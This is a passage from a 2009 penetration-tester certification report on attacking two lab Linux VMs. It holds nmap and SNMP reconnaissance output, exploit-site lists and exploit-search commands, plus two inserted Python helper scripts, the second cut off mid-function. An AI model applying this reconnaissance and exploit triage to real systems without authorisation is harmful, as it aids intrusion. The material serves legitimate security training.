Certified Penetration Tester (CPT) Practical Examination Report

Matthew Tiedeman
[email protected]
February 21st, 2009



Contents

1. Overview
2. Assumptions
3. Tools
4. Penetration test details
   A. Scanning
      i. Baseline scan of network
      ii. Port scanning and OS fingerprinting
      iii. Service fingerprinting - TCP services
      iv. Service fingerprinting - Validation of Apache HTTP service
      v. SNMP enumeration
      vi. Service fingerprinting - UDP services
   B. Sites used during the exploit research phase
   C. Remote exploits
      i. Research via anyside.org
      ii. Exploits – round 1
      iii. Research via secwatch.org
      iv. Exploits – round 2
   D. User discovery
      i. Abuse of finger
   E. Brute force password guessing
      i. Discovery of password for “user” account
      ii. Discovery of password for “cptvm1” and “cptvm2” accounts
   F. Research of cptvm1 and cptvm2 hosts
      i. cptvm1
      ii. cptvm2
   G. Penetration of cptvm1
      i. Local exploit research via anyside.org
      ii. Local exploit research via secwatch.org
      iii. Privilege escalation using a Kernel VMA exploit
      iv. Maintaining access via creation of a new “r00t” account
      v. Gathering the shadow password file
   H. Cracking passwords of the cptvm1 host
      i. Cracking of “user”, “cptvm1” and “cptvm2”
   I. Penetration of cptvm2
      i. Privilege escalation using a Kernel vmsplice exploit
      ii. Maintaining access via creation of a new “r00t” account
      iii. Gathering the shadow password file
   J. Cracking passwords of the cptvm2 host
      i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”
   K. Cracking passwords of the cptvm1 host – round 2
      i. Cracking of “root” and “r00t”
   L. Ultimate goal
      i. cptvm1 and cptvm2 hosts compromised
      ii. Passwords for root accounts on cptvm1 and cptvm2
   M. Lessons learned
      i. Searching exploit sites
      ii. Attack vectors
5. Appendix
   A. Source code for the Kernel 2.4 VMA exploit
   B. Source code for the Kernel 2.6 vmsplice exploit


1. Overview

The certified pen tester practical examination consists of compromising two VMware virtual machines, recovering the root password of each system and producing a penetration report.

The penetration report will contain, at a minimum, the details of all of the penetration test findings and a prioritized list of the vulnerabilities discovered. The penetration report should be submitted for review to: [email protected]

The following information was provided as part of the examination documentation:

- Virtual machine 1 (cptvm1) – VM containing a Linux system.
  - The system has the following static configuration:
    - IP Address: 192.168.1.200
    - Netmask: 255.255.255.0
    - Gateway: 192.168.1.254
    - DNS: 192.168.1.254
- Virtual machine 2 (cptvm2) – VM containing a Linux system.
  - The system has been configured to gain its network information via DHCP.
- Information gathered from one of the VMs during the penetration test may be required in order to compromise the other VM.

2. Assumptions

- While the penetration testing process consists of 5 phases (reconnaissance, scanning, penetration, maintaining connectivity and covering tracks), the reconnaissance and covering tracks phases will not be covered within this report.
- Stealthy scanning and penetration techniques will not be used.

3. Tools

The following tools were used during the completion of the penetration testing practical examination.

- back|track3 – Collection of penetration tester utilities.
- VMware Fusion – VMware virtual host software for OSX.
- Apple OSX – Host operating system used to execute VMware Fusion.
- nmap – Port scanning, fingerprinting, “swiss army knife” utility.
- httprint – HTTP fingerprinting utility.
- snmpenum.pl – SNMP enumeration utility.
- vi – Text editor.
- emacs – A “swiss army knife” editor (text/source code/etc).
- gcc – C (and other languages) compiler.
- tftp – Trivial File Transfer Protocol client.
- ssh – Secure shell client.
- finger – Finger utility.
- bash shell scripting – Small scripts and main interactive shell.
- sed – A stream editing utility.
- awk – Lightweight regular expression text scripting utility.
- sort – Unix text sort utility.
- hydra – Multiple protocol dictionary attack utility.
- aspell – Dictionary utility.
- John the Ripper – Password cracker.

4. Penetration test details

A. Scanning

i. Baseline scan of network

An initial scan of the network was performed to establish a baseline of the network configuration.

The gateway (192.168.1.1), host computer (192.168.1.30), back|track3 (192.168.1.102), cptvm2 (192.168.1.104) and cptvm1 (192.168.1.200) were identified. At this point, the identification of the hosts and their use comes mainly from the exam documentation and the knowledge of how the local network is configured.

bt live # nmap -sP -n 192.168.1.1/24

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-19 07:59 GMT
Host 192.168.1.1 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys)
Host 192.168.1.30 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.102 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.104 appears to be up.
MAC Address: 00:0C:29:3B:43:BC (VMware)
Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:27:60:0A (VMware)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.269 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

cptvm2 (192.168.1.104)

ii. Port scanning and OS fingerprinting

To determine the open ports and host operating system, a port scan and OS fingerprint of the specific VM IP addresses was conducted. The port scan included all TCP ports from 1 to 65535. Due to the differences between TCP and UDP, the UDP scan was completed only on ports from 1 to 1024.


Based upon the list of open ports, it can be concluded that cptvm1 (192.168.1.200) is most likely a server, while cptvm2 (192.168.1.104) is most likely a client workstation.

bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT      STATE SERVICE
7/tcp     open  echo
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
79/tcp    open  finger
80/tcp    open  http
109/tcp   open  pop2
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
199/tcp   open  smux
443/tcp   open  https
686/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
6000/tcp  open  X11
32768/tcp open  unknown
32770/tcp open  sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop

Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
939/tcp open  unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds

bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)
Stats: 0:00:23 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 25.05% done; ETC: 15:54 (0:01:08 remaining)
Interesting ports on 192.168.1.200:
Not shown: 870 open|filtered ports, 151 closed ports
PORT   STATE SERVICE
7/udp  open  echo
13/udp open  daytime
37/udp open  time
MAC Address: 00:0C:29:27:60:0A (VMware)

All 1024 scanned ports on 192.168.1.104 are open|filtered (872) or closed (152)
MAC Address: 00:0C:29:3B:43:BC (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 146.229 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
UDP ports: 7, 13, 37

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939

iii. Service fingerprinting - TCP services

As a TCP port number does not directly identify a service, fingerprinting of the services listening on the ports is required.

The majority of the TCP services were fingerprinted via nmap. The remaining services (ports 109, 993 and 995) will require further research to properly fingerprint.

bt live # nmap -sV --version-all -n -p7,21-23,79,80,109-111,143,199,443,686,993,995,6000,32768,32770 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:27 GMT
Interesting ports on 192.168.1.200:
PORT      STATE SERVICE  VERSION
7/tcp     open  echo
21/tcp    open  ftp      vsftpd 1.1.3
22/tcp    open  ssh      OpenSSH 3.5p1 (protocol 1.99)
23/tcp    open  telnet   Linux telnetd
79/tcp    open  finger   Linux fingerd
80/tcp    open  http     Apache httpd 2.0.40 ((Red Hat Linux))
109/tcp   open  pop2?
110/tcp   open  pop3     ipopd 2001.78rh
111/tcp   open  rpcbind  2 (rpc #100000)
143/tcp   open  imap     UW Imapd 2001.315rh
199/tcp   open  smux     Linux SNMP multiplexer
443/tcp   open  ssl/http Apache httpd 2.0.40 ((Red Hat Linux))
686/tcp   open  rquotad  1-2 (rpc #100011)
993/tcp   open  imaps?
995/tcp   open  pop3s?
6000/tcp  open  X11      (access denied)
32768/tcp open  status   1 (rpc #100024)
32770/tcp open  mountd   1-3 (rpc #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener
SF:icLines,4B,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server
SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,60,
SF:"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\r
SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB
SF:E\r\n");
MAC Address: 00:0C:29:27:60:0A (VMware)
Service Info: Host: 192.168.1.200; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.977 seconds

bt live # nmap -sV --version-all -n -p22,111,939 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMT
Interesting ports on 192.168.1.104:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 4.3 (protocol 2.0)
111/tcp open  rpcbind 2 (rpc #100000)
939/tcp open  status  1 (rpc #100024)
MAC Address: 00:0C:29:3B:43:BC (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.358 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
UDP ports: 7, 13, 37
TCP services:

7/tcp echo
21/tcp ftp vsftpd 1.1.3
22/tcp ssh OpenSSH 3.5p1 (protocol 1.99)
23/tcp telnet Linux telnetd
79/tcp finger Linux fingerd
80/tcp http Apache httpd 2.0.40 (Red Hat Linux)
109/tcp POSSIBLY pop2
110/tcp pop3 ipopd 2001.78rh
111/tcp rpcbind 2 (rpc #100000)
143/tcp imap UW Imapd 2001.315rh
199/tcp smux Linux SNMP multiplexer
443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)
686/tcp rquotad 1-2 (rpc #100011)
993/tcp imaps
995/tcp pop3s
6000/tcp X11
32768/tcp status 1 (rpc #100024)
32770/tcp mountd 1-3 (rpc #100005)

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)
111/tcp rpcbind 2 (rpc #100000)
939/tcp status 1 (rpc #100024)

iv. Service fingerprinting - Validation of Apache HTTP service

Often the banner of a web server is disguised to hide the server software that is actually running. The httprint utility was used to ensure that the web server is actually Apache.

In this case, the use of the Apache web server was validated.

bt linux # httprint -h 192.168.1.200 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
[email protected]

Finger Printing on http://192.168.1.200:80/
Finger Printing Completed on http://192.168.1.200:80/
--------------------------------------------------
Host: 192.168.1.200
Derived Signature:
Apache/2.0.40 (Red Hat Linux)
9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC50D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC86ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.0.40 (Red Hat Linux)
Banner Deduced: Apache/2.0.x
Score: 106
Confidence: 63.86
------------------------
Scores:
Apache/2.0.x: 106 63.86
Apache/1.3.27: 101 53.96
Apache/1.3.[4-24]: 101 53.96
Apache/1.3.26: 100 52.11
Apache/1.3.[1-3]: 96 45.12
TUX/2.0 (Linux): 89 34.42
Apache/1.2.6: 86 30.39
Agranat-EmWeb: 76 19.19
Orion/2.0x: 73 16.45
Microsoft-IIS/6.0: 69 13.20
Stronghold/4.0-Apache/1.3.x: 68 12.45
Apache-Tomcat/4.1.29: 67 11.74
Lotus-Domino/6.x: 65 10.38
AssureLogic/2.0: 64 9.74
Oracle Servlet Engine: 58 6.41
RomPager/4.07 UPnP/1.0: 54 4.64
cisco-IOS: 54 4.64
Netscape-Enterprise/6.0: 53 4.25
Netscape-Enterprise/4.1: 53 4.25
AkamaiGHost: 50 3.19
CompaqHTTPServer/1.0: 47 2.30
HP-ChaiServer/3.0: 46 2.04
Microsoft-IIS/5.0: 44 1.56
Microsoft-IIS/5.0 ASP.NET: 44 1.56
Microsoft-IIS/5.1: 44 1.56
Netscape-Enterprise/3.5.1G: 44 1.56
Com21 Cable Modem: 44 1.56
thttpd: 44 1.56
Lexmark Optra Printer: 44 1.56
Boa/0.94.11: 44 1.56
WebSitePro/2.3.18: 44 1.56
Stronghold/2.4.2-Apache/1.3.x: 43 1.34
Xerver_v3: 43 1.34
ServletExec: 41 0.96
Zope/2.6.0 ZServer/1.1b1: 41 0.96
WebLogic XMLX Module 8.1: 41 0.96
Microsoft ISA Server (external): 40 0.79
Jetty (unverified): 40 0.79
IDS-Server/3.2.2: 38 0.48
CompaqHTTPServer/4.2: 23 0.45
squid/2.5.STABLE5: 23 0.45
SunONE WebServer 6.0: 22 0.45
JRun Web Server: 22 0.45
Microsoft-IIS/URLScan: 21 0.44
NetWare-Enterprise-Web-Server/5.1: 24 0.44
TightVNC: 24 0.44
Linksys WRTP54G: 24 0.44
GWS/2.1 Google Web Server: 24 0.44
Netscape-Enterprise/3.6: 20 0.43
MiniServ/0.01 Webmin: 20 0.43
fnord: 20 0.43
MiniServ/0.01: 20 0.43
Tcl-Webserver/3.4.2: 20 0.43
Zeus/4.0: 25 0.43
Hewlett Packard xjet: 25 0.43
HP Jet-Direct Print Server: 25 0.43
Resin/3.0.8: 19 0.42
RealVNC/4.0: 26 0.41
WebLogic Server 8.x: 27 0.39
WebLogic Server 8.1: 27 0.39
Linksys with Talisman firmware: 27 0.39
Oracle XML DB/Oracle9i: 17 0.38
Microsoft-IIS/5.0 Virtual Host: 17 0.38
Adaptec ASM 1.1: 17 0.38
Linksys AP2: 28 0.36
BaseHTTP/0.3 Python/2p3.3 edna/0.4: 28 0.36
Lotus-Domino/5.x: 15 0.33
Netscape-Enterprise/3.6 SP2: 29 0.32
Netscape-Enterprise/3.5.1: 14 0.30
EHTTP/1.1: 14 0.30
Tomcat Web Server/3.2.3: 14 0.30
Surgemail webmail (DManager): 14 0.30
Jetty/4.2.2: 30 0.27
Netscape-Enterprise/4.1: 12 0.25
Zeus/4.1: 36 0.23
Intel NetportExpressPro/1.0: 36 0.23
Cisco-HTTP: 11 0.22
Cisco Pix 6.2: 11 0.22
AOLserver/3.4.2-3.5.1: 31 0.21
Jana Server/1.45: 31 0.21
EMWHTTPD/1.0: 31 0.21
Ipswitch-IMail/8.12: 31 0.21
RemotelyAnywhere: 10 0.19
3Com/v1.0: 10 0.19
Microsoft ISA Server (internal): 10 0.19
Allied Telesyn Ethernet switch: 10 0.19
WebSENSE/1.0: 10 0.19
Netgear MR814v2 - IP_SHARER WEB 1.0: 10 0.19
MikroTik RouterOS: 35 0.12
Zeus/4_2: 33 0.07
CompaqHTTPServer-SSL/4.2: 33 0.07
Microsoft-IIS/4.0: 34 0.02
Domino-Go-Webserver/4.6.2.8: 34 0.02
AOLserver/3.5.6: 34 0.02
dwhttpd (Sun Answerbook): 34 0.02
SMC Wireless Router 7004VWBR: 34 0.02
Belkin Wireless router: 34 0.02
VisualRoute 2005 Server Edition: 34 0.02
JC-HTTPD/1.14.18: 34 0.02
Ubicom/1.1: 2 0.01
Ubicom/1.1 802.11b: 2 0.01
Tanberg 880 video conf: 2 0.01
Snap Appliances, Inc./3.x: 1 0.00
Linksys AP1: 0 0.00
Linksys Router: 0 0.00
Linksys Print Server: 0 0.00
NetBuilderHTTPDv0.1: 0 0.00
NetPort Software 1.1: 0 0.00
Linksys BEFSR41/BEFSR11/BEFSRU31: 0 0.00
MailEnable-HTTP/5.0: 0 0.00

v. SNMP enumeration

The snmp service was identified as listening on port 199/tcp of the cptvm1 host, 192.168.1.200. In addition, the cptvm1 host OS was identified as Linux. With these two factors in mind, the snmpenum.pl utility can be utilized to gather system information. Of particular interest are the UDP services currently running on the hosts.

Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683, various process and service information was discovered.

bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt
----------------------------------------
 UPTIME
----------------------------------------
1 hour, 40:22.46
----------------------------------------
 HOSTNAME
----------------------------------------
cptvm1
----------------------------------------
 RUNNING SOFTWARE PATHS
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
 RUNNING PROCESSES
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
 MOUNTPOINTS
----------------------------------------
/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
----------------------------------------
 SYSTEM INFO
----------------------------------------
Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
----------------------------------------
 LISTENING UDP PORTS
----------------------------------------
7
13
37
111
123
161
162
631
683
----------------------------------------
 LISTENING TCP PORTS
----------------------------------------
7
21
22
23
79
80
109
110
111

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:

7/tcp echo
21/tcp ftp vsftpd 1.1.3
22/tcp ssh OpenSSH 3.5p1 (protocol 1.99)
23/tcp telnet Linux telnetd
79/tcp finger Linux fingerd
80/tcp http Apache httpd 2.0.40 (Red Hat Linux)
109/tcp POSSIBLY pop2
110/tcp pop3 ipopd 2001.78rh
111/tcp rpcbind 2 (rpc #100000)
143/tcp imap UW Imapd 2001.315rh
199/tcp smux Linux SNMP multiplexer
443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)
686/tcp rquotad 1-2 (rpc #100011)
993/tcp imaps
995/tcp pop3s
6000/tcp X11
32768/tcp status 1 (rpc #100024)
32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)
111/tcp rpcbind 2 (rpc #100000)
939/tcp status 1 (rpc #100024)

vi. Service fingerprinting - UDP services

Like TCP ports, UDP ports do not directly identify services. Therefore, the services listening on the UDP ports will need to be fingerprinted.

All UDP services except port 631 were properly fingerprinted.

bt linux # nmap -sU -sV --version-all -n -p7,13,37,111,123,161,162,631,683 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:54 GMT
Interesting ports on 192.168.1.200:
PORT    STATE         SERVICE  VERSION
7/udp   open          echo
13/udp  open          daytime
37/udp  open          time     (32 bits)
111/udp open          rpcbind  2 (rpc #100000)
123/udp open|filtered ntp
161/udp open          snmp     SNMPv1 server (public)
162/udp open|filtered snmptrap
631/udp open|filtered unknown
683/udp open          rquotad  1-2 (rpc #100011)
MAC Address: 00:0C:29:27:60:0A (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.467 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:

7/tcp echo
21/tcp ftp vsftpd 1.1.3
22/tcp ssh OpenSSH 3.5p1 (protocol 1.99)
23/tcp telnet Linux telnetd
79/tcp finger Linux fingerd
80/tcp http Apache httpd 2.0.40 (Red Hat Linux)
109/tcp POSSIBLY pop2
110/tcp pop3 ipopd 2001.78rh
111/tcp rpcbind 2 (rpc #100000)
143/tcp imap UW Imapd 2001.315rh
199/tcp smux Linux SNMP multiplexer
443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)
686/tcp rquotad 1-2 (rpc #100011)
993/tcp imaps
995/tcp pop3s
6000/tcp X11
32768/tcp status 1 (rpc #100024)
32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:

7/udp echo
13/udp daytime
37/udp time (32 bits)
111/udp rpcbind 2 (rpc #100000)
123/udp ntp
161/udp snmp SNMPv1 server (public)
162/udp snmptrap
631/udp unknown
683/udp rquotad 1-2 (rpc #100011)

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)
111/tcp rpcbind 2 (rpc #100000)
939/tcp status 1 (rpc #100024)
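As an added example that is not part of the original report, the following Python script parses the text output of the nmap scans quoted above into the per-host summary that the report assembles by hand after each step, marking services nmap could only guess (a trailing "?") as POSSIBLY, as the report does. The embedded sample is a trimmed copy of the scan output quoted above.

```python
"""Parse nmap -sV / -sU text output into the per-host summary used in this report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample: a trimmed copy of the nmap output quoted in the report.
SAMPLE = """\
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMT
Interesting ports on 192.168.1.104:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 4.3 (protocol 2.0)
111/tcp open  rpcbind 2 (rpc #100000)
939/tcp open  status  1 (rpc #100024)
MAC Address: 00:0C:29:3B:43:BC (VMware)
OS details: Linux 2.6.9 - 2.6.23

Interesting ports on 192.168.1.200:
Not shown: 870 open|filtered ports, 151 closed ports
PORT    STATE         SERVICE  VERSION
7/udp   open          echo
109/tcp open          pop2?
123/udp open|filtered ntp
161/udp open          snmp     SNMPv1 server (public)
MAC Address: 00:0C:29:27:60:0A (VMware)
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):")
# port/proto, state, service name, optional version text
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open(?:\|filtered)?)\s+(\S+)(?:\s+(.*?))?\s*$")
OS_RE = re.compile(r"^OS details: (.*)$")

Service = Tuple[str, str, bool]  # (service name, version string, confirmed by probe)


@dataclass
class Host:
    addr: str
    os_details: str = ""
    tcp: Dict[int, Service] = field(default_factory=dict)
    udp: Dict[int, Service] = field(default_factory=dict)

    def kernel_range(self) -> str:
        # "Linux 2.4.18 - 2.4.32 (likely embedded)" -> "Linux 2.4.18 - 2.4.32"
        return re.sub(r"\s*\(.*\)$", "", self.os_details)

    def summary(self) -> str:
        """Render the block the report repeats after each scanning step."""
        lines = [self.addr,
                 "Operating system: " + (self.os_details.split(" ")[0] or "unknown"),
                 "Kernel version: " + self.kernel_range()]
        for proto, table in (("tcp", self.tcp), ("udp", self.udp)):
            if not table:
                continue
            lines.append(f"{proto.upper()} ports: " + ", ".join(str(p) for p in sorted(table)))
            lines.append(f"{proto.upper()} services:")
            for port in sorted(table):
                name, version, confirmed = table[port]
                tag = "" if confirmed else "POSSIBLY "
                lines.append(f"{port}/{proto} {tag}{name} {version}".rstrip())
        return "\n".join(lines)


def parse_nmap(text: str) -> List[Host]:
    """Walk the output line by line; a new 'Interesting ports on' line starts a host."""
    hosts: List[Host] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = Host(addr=m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        m = OS_RE.match(line)
        if m:
            current.os_details = m.group(1).strip()
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, _state, name, version = m.groups()
            confirmed = not name.endswith("?")  # nmap appends '?' to guessed services
            entry = (name.rstrip("?"), (version or "").strip(), confirmed)
            (current.tcp if proto == "tcp" else current.udp)[int(port)] = entry
    return hosts


if __name__ == "__main__":
    for host in parse_nmap(SAMPLE):
        print(host.summary(), end="\n\n")
```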

B. Sites used during the exploit research phase

There are various sites available for the research of software exploits. While the following list is not all inclusive, it does provide fairly good coverage:

- http://www.milw0rm.com - Exploit database.
- http://secwatch.org/ - Exploits database
- http://packetstormsecurity.org - Exploits database
- http://www.securityforest.com/ - Exploits database and securityforest exploits update script.
- http://anyside.org/ - Exploits database
- http://www.remote-exploit.org/ - Contains back|track, milw0rm and securityfocus exploit update scripts.
- http://www.brandonhutchinson.com/ - Contains packetstormsecurity exploits update script.
- http://www.governmentsecurity.org/exploits.php – Exploit information.
- http://insecure.org/sploits.html – Exploit information.
- http://www.securiteam.com/exploits/ - Exploit information.
- http://www.iss.net/ – Exploits information.
- http://www.hoobie.net/security/exploits/ - Exploits information.
- http://www.vupen.com/exploits/ - Archive of private exploits and proof-of-concept codes developed by VUPEN Security.
- http://www.security-protocols.com - Security advisories.
- http://metasploit.org – Exploit platform.
- http://www.malware.com/ - Exploits information.
- http://www.immunitysec.com/index.shtml – Exploit platform.
- http://www.datastronghold.com – Exploit information and hacking techniques.
- http://www.illmob.org/ - Exploit information.

C. Remote exploits

i. Research via anyside.org

A list of exploits was downloaded from the anyside.org web site. The list consisted of a small description of the exploit and a link to the source code for the exploit. A list of search items was then created based upon the findings from the scanning phase.

$ cat ../commands/remote-search.txt
apache
finger
imap
ipop
ntp
open ssh
openssh
rpc
rpcbind
rpcmount
rpcstatus
rquota
snmp
snmptrap
telnet
vs ftp
vsftp
x11

The search items list and the exploit list were used to gain a list of possible remote exploits for the cptvm1 host.

$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remote-search.txt | sort -u > possible_remote_200.txt

$ ll
total 1664
drwxr-xr-x  6 matt matt    204 Feb 21 14:46 ./
drwxr-xr-x 16 matt matt    544 Feb 21 14:46 ../
-rw-r--r--  1 matt matt 126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--  1 matt matt 702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--  1 matt matt   9376 Feb  6 14:43 possible_remote_200.txt
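As an added example that is not part of the original report, the following Python script performs the same selection as the grep pipeline above over the "date;url;description" records and adds one refinement the resulting list shows is needed: records whose description names only another platform (Windows, Solaris) are dropped, so the candidates for a Linux host are not dominated by entries that cannot apply. The record format and the keyword list are taken from the listing above; the sample records are copied or shortened from it, except for one constructed "local" record that exercises the category filter.

```python
"""Triage a 'date;url;description' exploit list by category, keyword and platform."""
import re
from typing import Dict, List, Set, Tuple

# Search terms from the report's remote-search.txt (multi-word terms kept as phrases).
KEYWORDS = ["apache", "finger", "imap", "ipop", "ntp", "open ssh", "openssh",
            "rpc", "rpcbind", "rpcmount", "rpcstatus", "rquota", "snmp",
            "snmptrap", "telnet", "vs ftp", "vsftp", "x11"]

# Platform words that, without the target platform also named, mark a record as not applicable.
OTHER_PLATFORMS = {"windows", "win32", "win2k", "win2k3", "winxp", "solaris", "cisco"}

# Constructed sample: records copied or shortened from the listing above, plus one
# constructed 'local' record (not on anyside.org) to show the category filter.
SAMPLE_LIST = """\
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/dcom.c;Remote exploit utilizing the DCOM RPC overflow discovered by LSD. Includes targets for Windows 2000 and XP.
....;http://www.anyside.org/exp/exploits/remote/telnet.c;Solaris 2.6, 7, and 8 telnetd remote exploit.
2003-12-8;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.c;Apache 1.3.*-2.0.48 mod_userdir remote users disclosure Exploit. Effective against Linux and *BSD boxes.
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2008-01-01;http://www.anyside.org/exp/exploits/local/constructed-local.c;constructed local record mentioning apache, ignored by the category filter
"""

Record = Tuple[str, str, str]  # (date, url, description)


def parse_records(text: str) -> List[Record]:
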